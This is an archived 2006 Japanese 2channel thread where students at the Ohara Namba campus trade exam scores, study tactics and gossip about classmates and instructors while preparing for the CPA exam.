5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大原難波校公認会計士講座

1 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 15:52:54 ID:???
新しい難波校スレです。

2 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 17:04:00 ID:???
自習室に税理士受験生が多すぎる、どうにかして

3 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 19:02:26 ID:???
難波校の人は、入門生・上級生でだいたい何人くらい短答合格したの?

4 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 19:11:44 ID:???
結構いるよ。
30人以上は受かってるんじゃないかな。

5 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 19:57:13 ID:???
谷〇って人租税直対1位か、何者よ、こいつ

6 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 21:54:57 ID:???
法人49てwほぼ満点やんw

7 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 22:05:39 ID:???
上位20%って何点から?

8 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 22:42:32 ID:???
>>4
こらこらそんなあからさまな釣りをwww

9 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 23:04:23 ID:???
でも答練の時それぐらいいるんじゃねーか?

10 :一般に公正妥当と認められた名無しさん:2006/07/11(火) 08:11:19 ID:???
租税直対1の上位20%ラインは58

11 :一般に公正妥当と認められた名無しさん:2006/07/11(火) 10:31:51 ID:???
スレタイがしょーもなすぎなんで立て直していい?

12 :一般に公正妥当と認められた名無しさん:2006/07/11(火) 10:41:40 ID:???
見つけやすいスレタイ頼んだ!!

13 :一般に公正妥当と認められた名無しさん:2006/07/11(火) 17:21:17 ID:???
オッケー建てたら誘導するよ。どーもケータイでは無理なようなので帰ったらしてみまつ。おっさんにも来てほしいな☆

14 :おっさん ◆uqnuWIBAu2 :2006/07/11(火) 20:59:36 ID:MCUUgN0F
一応スレ覗いてますよョ捧
新スレよろしくフフフフフ

15 :一般に公正妥当と認められた名無しさん:2006/07/11(火) 23:25:50 ID:???
>>9
西中島生とかも来てるだろうし、論文対策までセットで申しこんだ短答落ちが
金もったいないから出てるんだろw
講義にでてるやつらひとりひとりに聞いてみろよ

16 :一般に公正妥当と認められた名無しさん:2006/07/12(水) 00:07:52 ID:???
立てにくい状況にあるのでもう少し待ってくだされ。

17 :一般に公正妥当と認められた名無しさん:2006/07/12(水) 10:54:51 ID:???
短答受かったが論文自信ねえなあ・・・


18 :一般に公正妥当と認められた名無しさん:2006/07/12(水) 13:39:26 ID:???
そこで科目合格特化作戦ですよ

19 :一般に公正妥当と認められた名無しさん:2006/07/12(水) 16:15:19 ID:???
新スレ立たないぞ。
こんなスレタイじゃ盛り上がらないよ

20 :一般に公正妥当と認められた名無しさん:2006/07/12(水) 16:59:29 ID:???
確かにそうだが、このスレしかないんだからこれでいいんじゃないか???

21 :一般に公正妥当と認められた名無しさん:2006/07/12(水) 17:10:27 ID:???
特化作戦→科目合格→2年後→1科目残し落ちる




22 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 10:15:08 ID:???
俺は租税を捨てたよ。
短答通ると思ってなかったから、講義もあまり受けなかった。
答練少し受けてみたけど、あんなに猛者がいるんじゃやるだけ無駄だと思うをだけどね。

23 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 13:11:07 ID:???
一緒に氏ね!

24 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 14:45:29 ID:???
俺も租税やばすぎ。
谷〇に教えてもらおかな・・・

25 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 20:08:53 ID:???
こいつ租税凄いよな、どんな勉強してんのやろ?

26 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 20:39:33 ID:???
今だにどいつかわからんのだが…

27 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 21:14:09 ID:???
この人は見た目と頭の良さのギャップが激しいよ

28 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 21:30:38 ID:???
租税は答練5割りから6割くらいあってる感じんなんだけど
これで上位何パーくらい?

29 :一般に公正妥当と認められた名無しさん:2006/07/13(木) 23:04:13 ID:???
問題によるけど平均は超えてると思うよ。
直対2回目とかだと上位20%に入ってるんじゃないかな。


30 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 06:21:31 ID:???
租税切るわ、

31 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 09:56:40 ID:???



32 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 14:04:30 ID:???
俺難波では無いが、俺の周りの奴らも租税まで手を出せてない

俺も今回は諦めた。

33 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 14:38:35 ID:???
んじゃ俺も捨てるわ、科目合格目指します

34 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 14:45:02 ID:???
んじゃ俺も!俺も!

35 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 14:52:42 ID:???
分母乙

36 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 16:42:00 ID:???
>>35
これは油断させる作戦だぞ


37 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 18:55:12 ID:???
来週の公開模試って短答落ちの俺でも受けてオッケー?

38 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 19:13:19 ID:???
全然OKだよー
平均点さえ下げなければ…

39 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 19:21:38 ID:???
さて、難波から名前載る強者は出るかな??

40 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 19:44:20 ID:???
檜〇、奥〇、谷〇は確定かな。
して4人目は現われるのか?

41 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 20:52:37 ID:???
谷○は無理だよ、租税だけだろ載ってるの。奥○は入門?福○はどうなの?檜○って人もよく載ってるよな。

42 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 21:01:07 ID:???
福〇は無理でしょ、この3人と比べると劣りすぎ。
谷〇と檜〇は年末と短答の公開模試ともにランクインしてるから本命だろ。
谷〇は本科生だから租税以外名前載ってないんだと思うよ。


43 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 21:08:37 ID:???
なるほど。
で、難波では何人短答受かったんだ?答練とか少し減った気はするがまだ結構いるような。

44 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 21:40:57 ID:???
結構短答落ちも受けてるはず、多分難波で本当の強者は10人もいないはず、上の3人と残り5人くらいでしょ。

45 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 21:46:00 ID:???
なんか俺とおまいの専用スレになりつつあるようなww
強者は八人くらいか、いつも名前載ってるのそれくらいだもんな。一応俺も短答受かってるが入門でギリギリ…オヌシは?

46 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 21:51:23 ID:???
まぁおっさんとかも見てくれてると思うよ。
俺もほんとギリギリで受かったな、でも短答特化しまくってたから論文に拒否反応起こしまくりw

47 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 22:02:40 ID:???
入門か上級かどっちだ?

48 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 22:04:43 ID:???
入門だよ、これ以上の詮索はお互いよくないからやめよな。
入門って何人受かったのかな?はっきりした人数がわからん

49 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 22:20:55 ID:???
入門かー同志よww
顔合わせてるかと思うとビビるな。
結構受かってるっぽくないか?14、5くらいかなと思うが。
上級さんたちは20人ちょいとか聞いたぞ。

50 :一般に公正妥当と認められた名無しさん:2006/07/14(金) 22:28:32 ID:???
ここは匿名で息抜いていこーぜw
けっこ−受かったみたいやな、今年受かったのは正直でかいからなぁ!!
租税はどないでっか?


51 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 00:41:25 ID:???
悪い、寝てたww
ほんと短答受かってよかったよ。落ちてりゃ論文挑戦も不可能だったわけだし。租税は…ヤバイの一言。所得と理論を切る方向で検討中なんだが。

52 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 01:29:37 ID:???
俺みたいな答練悪かった奴でも受かったのに、落ちる奴がいるほうが驚きだなw
上級生で落ちた奴を何人か聞いたけどとんでもないあほだよwwwwwwww
何年やってんだよwwwwwwwwwwwWWWW

53 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 12:01:43 ID:???
久々に見たら何この有様www
入門同志のスレですか

54 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:31:58 ID:???
名古屋校の入門生ですが参加していいですか?

55 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:42:24 ID:???
大歓迎w
もちろん短答は合格済やんな?

56 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:45:24 ID:???
当たり前でだがね。

57 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:48:45 ID:???
よし、OK
勉強進んでる?

58 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:50:36 ID:???
経営額がや

59 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:51:09 ID:???
ばい。

60 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 17:59:21 ID:???
租税はどないしちょるとね?

61 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:03:33 ID:???
法人と所得は得意だが消費税はいまいちわからん。
理論はまだ手をつけていないがね。
理論は切っていいのか?

62 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:14:17 ID:???
>>61
入浴しながら読むとか
タバコすう時に読むとか
自習時間じゃない時でもいいから
理論用の教材なりを読んだ方がいいと思うよ。

63 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:16:10 ID:???
適格、非適格ストックオプションについて、付与した者と付与された者の課税関係を述べよ。
サンプルがこのレベルだからやっても無駄、誰も解けねー

64 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:18:45 ID:???
荘まとめで対応できるのか?
きみはどんな感じ?

65 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:20:05 ID:???
計算過程を文書にできる位のレベル、これ以上はやらないし無駄w

66 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:25:44 ID:???
監査は荘まとめでいいか?

67 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:27:39 ID:???
>>64
俺T生なんだけど
tのまとめの部分はある程度
いけるように準備はする。(まとめは大体同じでしょ?)
まとめ以外は計算をとくために
理解してる部分でかすれば御の字て感じ

68 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:30:19 ID:???
tの財表荘まとめはどんな感じ?

69 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:35:50 ID:???
>>68
・棚卸資産の評価基準について
・ストックオプション
・四半期財務諸表
主に最初の二つを中心にやった
大原は?

70 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:37:43 ID:???
同じようなものだが四半期財務なんてやってない。

71 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:40:00 ID:???
四半期は講義ではほとんど触れてないけど
テキストには一応少しのせたってかんじ。
びびる必要はゼロ

72 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:41:53 ID:???
tの全問錬の商法はなにでたの?

73 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:47:15 ID:???
それは土日組の人がいるかもしんないからその人たちの
ために明日書き込みってことで。
出ないと思うが仮に四半期でたら、中間と同じ論理の応用と
開示の迅速性、適時性の要求を踏まえて考えたら
ぶっとびはないと思う

74 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:47:40 ID:???
四半期になっても要は実績と予測だろ?

75 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:49:44 ID:???
>>74
そんな感じで捉えていいと思うよ

76 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 18:51:32 ID:???
ありがと−!!
ストックオプションはどの論点?
俺は費用処理の是非と費用測定のタイミングしか対策してない。

77 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 23:22:22 ID:???
入門生集合ー!
馬鹿な上級生なんて論文で蹴散らそうぜ!

78 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 23:23:13 ID:???
費用測定のタイミングって去年出たんじゃなかった

79 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 23:37:19 ID:???
こんちわっす!
たまに見てるけど俺も入門やで。
実際難波の戦力は入門生の方が上だと思うんだが。

80 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 00:05:48 ID:???
>>79
はげど。
難波の上級生の大半は大したことないと思う。
レベルの低い上級生とか短答落ちは学校来なくていいよ。
自習室で短答落ちと上級生は別部屋にすべき。

81 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 00:07:06 ID:???
>>76
確か簡単な事例をテキストで説明して
その後費用処理の是非に時間を費やした。

>>79
いくらなんでも入門の方が上な訳ないんじゃないの?
なめすぎ

82 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 00:31:34 ID:???
短答合格入門生>>>>>>>>>>>>>>>>>>>>短答落ち上級生



83 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 00:32:42 ID:???
ただし、試験中に激しい便意に襲われたなどの特段の事情がある場合はこの限りではない。

84 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 12:58:52 ID:???
難波の上級生もっとがんばれよ。
入門生に調子に乗らすなよ。


85 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 14:18:26 ID:???
上級生、何年もやってんだから入門生ごときに負けるなよ。
本当は俺、短答落ち入門生で準上級生なんだけどな。

86 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 16:44:55 ID:???
実際皆どうなんだよww短答受かってるのか?俺は受かってるぞ!

87 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 16:46:33 ID:???
俺は68だったが2問マークミスしたから実質短答落ちとは言えない

88 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 17:19:53 ID:???
結局受かったの?
落ちたの?

89 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 17:22:58 ID:???
形式的には落ちた
しかし、これをもってして短答落ちとしてしまうと世間の誤解を招き
法的安定性を害するので口外していない

90 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 17:53:07 ID:???
どうせ60くらいだろ?そんな醜い言い訳までしてww
今日の講演会&セミナー受けたかい?来年のために早く始動しなよ。

91 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 18:04:16 ID:???
実質的には合格しているという内面と合格通知が未だ届かないという外見が一致しないため、
民法93条を類推適用し、原則この不合格は無効と解する

92 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 18:11:42 ID:???
企業法問答練より問題集まわすほうがいいかな?
直対は何がいままで何がでてたっけ?

93 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 18:14:38 ID:???
関西弁でおk

94 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 20:09:44 ID:???
>>72
TAC全党企業法
第一問
1、取締役の任務懈怠責任について述べよ
2、過失が無いときにも取締役が責任を負う場合について述べよ
第二問は企業結合系

95 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 23:43:06 ID:???
全答練って本館でやるの?

96 :一般に公正妥当と認められた名無しさん:2006/07/17(月) 01:44:26 ID:???
セミナーに出たら、
難波校では講師陣が受講生のことを把握してしっかり指導します、
みたいなことだったけどどうなの?
担任みたいなかんじでやってくれるのかな

97 :一般に公正妥当と認められた名無しさん:2006/07/17(月) 02:12:38 ID:???
脱落者多いから担任付けて管理させるんじゃない?


98 :一般に公正妥当と認められた名無しさん:2006/07/17(月) 07:15:36 ID:6pWsXutv
TACか大原にしようかとおもってます。
大原だと大阪か難波のどっちかになるんだけど、どっちの方が講師の質がいいの?

99 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 09:25:00 ID:???
大原は高卒か会計士試験をまさかの不合格で職に困り採用された奴が大半
生徒の気持ちはわかるが受かる奴の気持ちは分からんってな訳だ

100 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 19:41:42 ID:???
100ゲット!!

101 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 19:54:47 ID:???
どうよ模試の出来具合は?

102 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 20:33:29 ID:???
租税第一問目がぼろぼろかも。理論何かいていいかよくわからんかった。

103 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 20:55:31 ID:???
まさかのストックオプションだったな、こんなのネタバレしても対策できないだろw
谷〇はできたのかな?

104 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 21:26:38 ID:???
谷○って今日いたの?

105 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 21:50:27 ID:???
入り口付近にいた奴だよ、

106 :一般に公正妥当と認められた名無しさん:2006/07/18(火) 21:51:42 ID:???
髪黒くなかった?

107 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 12:54:10 ID:???
よく喫煙室にいる入門生3人は短答合格か??メガネかけたシャツの着こなしがオシャレなやつと、ジャマイカ色のキャップをかぶったやつ、でかくて頭の悪そうな服装がいまだにB系ぽいやつ。

108 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 13:03:07 ID:???
俺が独自に調査したところによると、84・69・86らしい

109 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 14:37:51 ID:???
>>てことは3人とも合格??俺あのグループ嫌い。一緒に論文戦うのか。

110 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 16:08:37 ID:???
すまん
>>108は俺の彼女のスリーサイズだった
寝てるときについ出来心で測ってしまった

111 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 16:54:55 ID:???
俺もあの3人組み嫌いだな。
短答終わってから自習室で爆睡かましてるのよく見かけるんだが、、、。
ほんとにあの3人組み受かってるのか?

112 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 18:52:52 ID:???
安心しろ。あいつらは落ちてるから。

113 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 19:05:58 ID:???
でも全答練受けてたじゃん。

114 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 19:14:22 ID:???
短答落ちも受けてるから。
目的は理解できないけど、多分Mなのかな

115 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 20:01:20 ID:???
そのうち一人は喫煙室で受かったみたいな話してたよ。

116 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 20:03:20 ID:???
短答合格者の名前が官報に載らない以上、真相は藪の中だな

117 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 21:41:46 ID:???
ばかでかいやつは落ちてるだろ、岡ちゃんにクソみたいな質問してるし。

118 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 21:55:41 ID:???
俺さ、、、岡ちゃんのことが


  か  な  り

   好  き  だ。

119 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 21:58:39 ID:???
岡ちゃんか・・・。
勉強ばっかりしすぎて、現実が見えないんだな〜?

120 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 22:02:18 ID:???
大阪校生だが今日って昨日より人数増えてなかった?なぜ?

121 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 22:14:32 ID:???
>>120
ヒント 租税棄てと会計学

122 :一般に公正妥当と認められた名無しさん:2006/07/19(水) 22:16:13 ID:???
>>118
LAVEってなに?
お願いだからLOVEの間違いとか言わないでね。

123 :118:2006/07/19(水) 23:05:38 ID:???
LOVEの間違いでした。

124 :一般に公正妥当と認められた名無しさん:2006/07/20(木) 01:40:01 ID:???
一人受かってるってどっちが受かってんの?

125 :一般に公正妥当と認められた名無しさん:2006/07/20(木) 01:48:32 ID:???
キャップ君の方。
メガネ君は知らんわ。

126 :一般に公正妥当と認められた名無しさん:2006/07/20(木) 22:33:26 ID:???
>>109
オマエ入門生か?上級生か?マジシバくぞ!?

127 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 00:13:40 ID:???
はいはい、と。
モヤシみたいな貧弱な君に勝てる相手なんかいないお^^


128 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 01:10:56 ID:???
メガネっ子は落ちたのか。
俺の癒しだったのに…

129 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 02:12:04 ID:???
めがねっこって入門のあのコ?
最近見ないな…

130 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 10:20:54 ID:???
今年受験のヤツに127みたいなキモチワルイのがいるの??
論文落ちたら俺らと同期かよ、あんまりかかわりたくねえな。

131 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 16:34:47 ID:???
7階にパソコンとにらめっこしてる奴ガイルんだが…

132 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 20:54:32 ID:???
めがねっこはとーーーーーーぜん落ちてるだろwww
PCいじってる香具師は税理士だな。時代の波にのってデイトレ気分になってんだろ

133 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 21:58:11 ID:???
会計学と租税の答練で最近返ってきたものない?
平均と上位20%だけ教えて欲しいな。

134 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 23:38:03 ID:???
めがねっこカワイソス(^0_0^)

135 :一般に公正妥当と認められた名無しさん:2006/07/22(土) 20:41:53 ID:???
おっさん召喚!

136 :一般に公正妥当と認められた名無しさん:2006/07/23(日) 17:35:24 ID:???
そろそろ上級始まるけど受ける香具師ってどれぐらいいるのかな?


137 :一般に公正妥当と認められた名無しさん:2006/07/23(日) 18:13:36 ID:???
イパーイ!

138 :一般に公正妥当と認められた名無しさん:2006/07/23(日) 19:28:47 ID:???
で、講師たちはどうだったの?
I川先生はもちろん合格したんだよね?

139 :一般に公正妥当と認められた名無しさん:2006/07/23(日) 20:02:15 ID:???
○川は微妙…岡○と湊○はゴカーク

140 :一般に公正妥当と認められた名無しさん:2006/07/23(日) 22:04:13 ID:???
湊◯も受けたの?
初耳なんだけど…

141 :一般に公正妥当と認められた名無しさん:2006/07/23(日) 23:40:18 ID:???
まつは?

142 :一般に公正妥当と認められた名無しさん:2006/07/24(月) 23:32:58 ID:???
上級ってどんなことするの?
ベテ一年目なので教えてちょ。

143 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 06:22:10 ID:???
答練はほどほどにさぼりつつ、喫煙室でダベって、お互いの傷の舐め合いをするために
みんなで飲みに行って、自分より成績の悪いやつを必要以上にけなして、講師の悪口を
言い、まぐれで短答に合格しても論文では弾かれる・・・、ってとこかな??

144 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 09:17:40 ID:???
と言うことはベテラン会計士受験生はニート以上フリーター未満???

145 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 11:02:37 ID:???
自覚してない分だけニートよりタチ悪いよ。
気付いてないヤツ大杉ww

146 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 12:30:01 ID:???
初上級の者です。
上級財表の木村って先生いいの?

147 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 13:37:25 ID:???
会計士受験生ってだけで社会的に認められていると勘違いな人多いよな確かに
上級生になるにつれて麻痺するんだよ。
はやく合格しないとな…

148 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 15:06:48 ID:???
>143
TACの連れが言うには、ベテの中でも上の階級になると講師に対して予備校の教育方針にまで
口を出すやつが出てくるらしいなw

149 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 15:53:10 ID:???
ベテって言われるのは何回目から?

150 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 16:36:13 ID:???
4回目

151 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 16:40:23 ID:???
難波校には何人くらいいるのかな?
喫煙室組は相当数当て嵌まりそうだが…

152 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 16:48:03 ID:???
上級っていつからやんの?

153 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 23:05:09 ID:???
八月からするってよー
基礎から固めたい香具師は7月からしてるらしい

154 :一般に公正妥当と認められた名無しさん:2006/07/25(火) 23:59:15 ID:???
八月から俺も上級生か。
みんなよろしくー。

155 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 00:04:44 ID:???
上級コースの日程表に書いてるじゃねーか。
理論はのきなみ8月頭から、計算は…近○さんが担当か…。

156 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 00:47:24 ID:???
岡ちゃんは受かったらやめちゃうの?

157 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 13:29:35 ID:???
なぁみんな、この時期やる気低下しないか?
模試終わった後で、あと4週間しかないっていう今の時期なのに…暑いし…何かやばいよな…

158 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 13:32:36 ID:???
心配無用 なんば校は元々ヤル気がない


159 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:04:54 ID:???
難波からは何人受かるかな?

160 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:05:34 ID:???
8人

161 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:07:10 ID:???
毎年半分くらい受かるもんなの?
パンフには大原論文合格率60%とか書いてたけど

162 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:08:27 ID:???
大原のカリキュラムをすべて受講したうえで短答合格した人のうちの60%でしょ

163 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:09:08 ID:???
難波で受かりそうな8人を列挙せよ。

164 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:12:42 ID:???
なんか胡散臭いデータだな。
実質は三割くらいかな?

165 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:14:27 ID:???
講座申し込んだ人のうち10%くらいだよ
半分くらいは途中でドロップアウトするし

166 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:20:02 ID:???
福〇はガチ!!

167 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:23:07 ID:???
だな

168 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:25:09 ID:???
上級生はどうなの?がんばってる?
去年一緒にやってたから少し気になるんだ。

169 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:28:29 ID:???
今3人はいるな。
真っ昼間から暇なやつらだ。

170 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:32:41 ID:???
科目合格狙いの奴おる?

171 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:54:17 ID:???
それは危険だ…

172 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:57:56 ID:???
ノシ

173 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 14:58:32 ID:???
俺は租税経営監査企業法は切りました。

174 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 16:45:18 ID:???
>>173

てことは会計学のみ?いいなぁ、8月23日だけ行けばいいもんね。

175 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 19:36:02 ID:???
>>170
租税・経営は、諦めた。

176 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 20:50:56 ID:???
俺は企業法と経営をほとんど切ってるけど、一応試験は受けるよ。

177 :一般に公正妥当と認められた名無しさん:2006/07/26(水) 22:08:10 ID:???
斬ってる科目晒そうぜ!皆、オレに続け!
租税○

178 :一般に公正妥当と認められた名無しさん:2006/07/27(木) 18:47:39 ID:???
明日のステップ簿記最後か…。岡○に会いたいから短答落ちでも出ていいかな?

179 :一般に公正妥当と認められた名無しさん:2006/07/27(木) 18:50:47 ID:???
いいよ

180 :一般に公正妥当と認められた名無しさん:2006/07/27(木) 19:29:49 ID:???
上級財表の木村ってどうなの?解りやすい?

181 :一般に公正妥当と認められた名無しさん:2006/07/27(木) 19:58:48 ID:???
租税がどうにもならん。
どんな速度で書いたら7割、8割とれるんだ?
成績優秀者教えてくれ。

182 :一般に公正妥当と認められた名無しさん:2006/07/27(木) 20:00:04 ID:???
試験開始から終了までほぼ書きっぱなし

183 :一般に公正妥当と認められた名無しさん:2006/07/27(木) 23:31:35 ID:???
むしろ簡単な計算過程は配点来ないから必要ない。


184 :一般に公正妥当と認められた名無しさん:2006/07/28(金) 20:11:16 ID:???
今日のステップ平均何点くらいだった?

185 :一般に公正妥当と認められた名無しさん:2006/07/28(金) 21:19:34 ID:???
オレも知りたい!平均と上位20%おせーて。自習してる奴誰か6階掲示板見に行ってくれ。

186 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 13:17:00 ID:???
72点

187 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 13:56:06 ID:???
それ上位20%の下限?平均キボンヌ

188 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 20:01:26 ID:???
平均だぞ

189 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 21:18:43 ID:???
20%は?

190 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 21:27:03 ID:???
ほんま?俺44しかなかったよ…

191 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 21:40:26 ID:???
みんな冷たいね。
誰かほんとのこと教えてよ

192 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 21:41:44 ID:???
こういう時期だからな・・。真実は自分の目で確かめてくるんだ。

193 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 21:42:19 ID:???
みんなもう来年に向かって始動していますが、何か?

194 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 21:56:25 ID:???
誰か真実を!
簿記ステップ直対10回の平均と上位20%を!

195 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 22:15:35 ID:???
真実は、
最高 88
上位20% 64
平均 51
です。

196 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 22:19:36 ID:???
ほんとですか?

197 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 22:45:53 ID:???
公開模試簿記18法人26管理、計算は全答
だったけどこれってやっぱきついかな?

198 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 23:01:14 ID:???
全部俺より優秀…
入門?上級何年目?

199 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 23:04:33 ID:???
>>197
きみ、合格っ・・・・!

200 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 23:07:11 ID:???
簿記、法人は勝った!
でも管理全答はすごいなぁ。
197で実際のとこどれくらいなんだろう

201 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 23:41:31 ID:???
197だけどT生、おっさんになびかれて以来ちょくちょく
きてる。
簿記は正直ひどいと思う。
